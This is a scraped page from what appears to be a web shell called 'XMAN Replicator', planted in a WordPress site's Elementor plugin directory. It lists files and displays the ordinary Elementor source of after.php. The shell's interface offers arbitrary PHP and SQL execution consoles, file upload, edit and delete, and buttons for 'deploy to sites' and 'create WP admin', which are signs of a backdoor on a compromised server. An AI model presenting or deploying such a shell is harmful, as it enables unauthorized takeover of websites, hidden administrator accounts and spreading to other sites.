🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
rs
/
wp-content
/
plugins
/
elementor
/
data
/
base
/
processor
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2023-10-14 14:54
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2023-10-14 14:54
🔄
🗑️
🗑️📁
⬇️
🔒
after.php
468 B
-rw-r--r--
2023-10-14 14:54
✏️
🔄
🗑️
⬇️
🔒
before.php
409 B
-rw-r--r--
2023-10-14 14:54
✏️
🔄
🗑️
⬇️
🔒
View: after.php
<?php namespace Elementor\Data\Base\Processor; use Elementor\Data\Base\Processor; abstract class After extends Processor { /** * Get conditions for running processor. * * @param array $args * @param mixed $result * * @return bool */ public function get_conditions( $args, $result ) { return true; } /** * Apply processor. * * @param $args * @param $result * * @return mixed */ abstract public function apply( $args, $result ); }
PHP Console
Execute
SQL Console
Execute